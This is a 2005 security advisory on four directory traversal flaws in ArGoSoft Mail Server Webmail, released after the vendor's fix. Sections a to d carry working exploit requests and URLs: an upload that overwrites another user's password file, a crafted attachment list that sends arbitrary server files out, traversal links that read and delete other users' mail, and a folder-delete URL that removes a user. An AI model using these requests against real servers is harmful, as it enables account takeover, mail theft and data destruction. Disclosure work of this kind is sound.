Objectives About Us Sponsors News Past Events Contact Us
Login G-TEC CC Mirror Forums Links

 

 

SIG^2 Vulnerability Research Advisory

ArGoSoft Mail Server Webmail Multiple Directory Traversal Vulnerabilities

by Tan Chew Keong
Release Date: 09 Feb 2005

Summary

ArGoSoft Mail Server is fully functional SMTP/POP3/Finger (Pro version also has IMAP module) server for Windows 95/98/NT/2000, which will let you turn your computer into the email system. It's very compact, takes about 1-5 Mb of disk space (depending on the version), does not have any specific memory requirements, and what is the most important - it's very easy to use.

Multiple directory traversal vulnerabilities were found in ArGoSoft Mail Server's Webmail that may be exploited by a logon mail user to upload files to arbitrary directories on the server, retrieve arbitrary files from the server, access other users' emails, and create/delete arbitrary directories on the server.

 
Tested System

ArGoSoft Mail Server Version 1.8.7.3 on English WinXP SP2, Win2K SP4.

 
Details

This advisory documents 4 directory traversal vulnerabilities in ArGoSoft Mail Server's Webmail. Exploitation of these vulnerabilites requires a valid logon account on the Webmail. Please note that although the examples use the forward-slash (../) character for directory traversal, in several cases, using the back-slash character is also possible (..\).

a. Directory traversal in email attachment filename allows file upload to arbitrary directories

ArGoSoft Mail Server's Webmail allows a logon mail user to upload file attachments when composing an email. Lack of input sanitization of the supplied filename allows the user to upload files to arbitrary locations on the server. This may be exploited by a malicious mail user to upload and replace other users' password file (userdata.rec) with a copy that has known password, thus allowing him/her to logon as other users.

A sample malicious file upload HTTP request is shown below.

POST /attachfile HTTP/1.0
Host: localhost
Cookie: ams-auth=XXXXXXXXXXXXX
Content-Type: multipart/form-data; boundary=---------------------------24242261923581
Content-Length: 456
Connection: Close

-----------------------------24242261923581
Content-Disposition: form-data; name="x"

52
-----------------------------24242261923581
Content-Disposition: form-data; name="y"

10
-----------------------------24242261923581
Content-Disposition: form-data; name="attfile"; filename="../../test2/userdata.rec"
Content-Type: application/octet-stream

__VER__1.8.7.3
XXXXXXXX
test2

test2
0
1
0

-----------------------------24242261923581--

 
b. Directory traversal in _msgatt.rec allows any arbitrary files on the server to be sent as attachment

When the Webmail user is composing an email, all attachments uploaded for that email will be saved in the following temporary directory.

C:\Program Files\ArGo Software Design\Mail Server\_users\_nodomain\username\_tempatt\

A sample listing of this directory is shown below.

 Directory of C:\Program Files\ArGo Software Design\Mail Server\_users\_nodomain\test\_tempatt

02/09/2005  08:18p      <DIR>          .
02/09/2005  08:18p      <DIR>          ..
02/09/2005  08:17p                  90 inbox.msl
02/09/2005  08:18p                 167 TESTFILE.txt // file attachment uploaded by user
02/09/2005  08:18p                  13 _msgatt.rec
02/09/2005  08:18p                   0 _msgbody.rec
02/09/2005  08:18p                 136 _msgdata.rec
               5 File(s)            406 bytes

The server will create the file (_msgatt.rec) in this temporary directory. This file contains the filename of all file attachments that the user has uploaded while composing the current email. The user can control the contents of this file by uploading a file attachment with the same filename as this server generated file. The user uploaded copy will replace the one generated by the server.

By uploading a specially crafted _msgatt.rec containing directory traversal characters, it is possible to cause the server to send any arbitrary files on the server as attachment to the user. A malicious user may exploit this vulnerability to email other user's password file (userdata.rec) to himself.

A sample malicious _msgatt.rec file is shown below. 

../../test2/userdata.rec

This malicious file, when uploaded as attachment and saved to the temporary directory, will contain two additional lines of server generated entry as shown below. 

../../test2/userdata.rec
-
_msgatt.rec

To ensure that the email can be sent correctly, the malicious user must "detach" the last two files (i.e. "-" and "_msgatt.rec"). This can be trivially done via the web interface as shown below. Subsequently, when the user retrieves his email via IMAP, he'll be able to receive test2's userdata.rec file as attachment.

 
c. Directory traversal in /msg and /delete "Folder" parameter allows reading/deleting of other user's emails

The /msg link allows the Webmail user to view his/her emails. The full URL is 

http://[hostname]/msg?MsgNo=0&Folder=inbox&UIDL=sjo2z7plfizwvu3x

It is possible to view other user's email by using directory traversal characters in the Folder parameter and specifying a correct UIDL. The UIDL uniquely identifies the email and guessing the UIDL of another user's email is impractical. However, it possible to obtain a list of the UIDL of another user's emails by surfing to the following link while logon. Note that inbox.msl only exists if the other user is currently logon. i.e. The server will create inbox.msl in the every user's temporary directory (see vulnerability b. above) only after he/she has logon. 

http://[hostname]/_users/_nodomain/other_username/_tempatt/inbox.msl

Sample contents shown below
j18mspvyiitdzxdw
zrr77aepklpadkv5
nuczv11pjysmrceu
10zptzip5g8ejlwx
ymufn1briuvp2ocu

It is then possible to retrieve the other user's emails using the following link. 

http://[hostname]/msg?MsgNo=0&Folder=../other_username/inbox&UIDL=j18mspvyiitdzxdw

The /delete link, which allows the user to delete his/her own emails, is similarly vulnerable.

A sample malicious POST request to /delete is shown below, this will delete mails belonging to user test2.

POST /delete HTTP/1.0
Host: localhost
Cookie: ams-auth=XXXXXXXXXX
Content-Type: application/x-www-form-urlencoded
Content-Length: 77
Connection: Close

x=36&y=11&sel=0&act=1&folderselect=&j18mspvyiitdzxdw=on&Folder=../test2/inbox

 
d. Directory traversal in /folderadd and /folderdelete "Folder" parameter allows creating/deleting arbitrary directories on the server

The /folderadd and /folderdelete links allows the Webmail user to create/delete mail folders. It is possible to use directory traversal characters in the Folder parameter to create/delete directories in arbitrary locations on the server. A malicious user may exploit this vulnerability to delete other users' entire mail directories, which is effectively the same as removing the users from the system.

The following will totally remove user test2 from the system.

http://[hostname]/folderdelete?Folder=../test2

 
Patch

  1. Upgrade to version v1.8.7.4.

 
Disclosure Timeline

06 Feb 05 - Vulnerability Discovered.
08 Feb 05 - Initial Vendor Notification.
08 Feb 05 - Received Notification from Vendor that Fixed Version was Released.
09 Feb 05 - Public Release.

 
Contacts

For further questions and enquries, email them to the following.

Overall-in-charge: Tan Chew Keong


Updated: 09/02/2005
webmaster@security.org.sg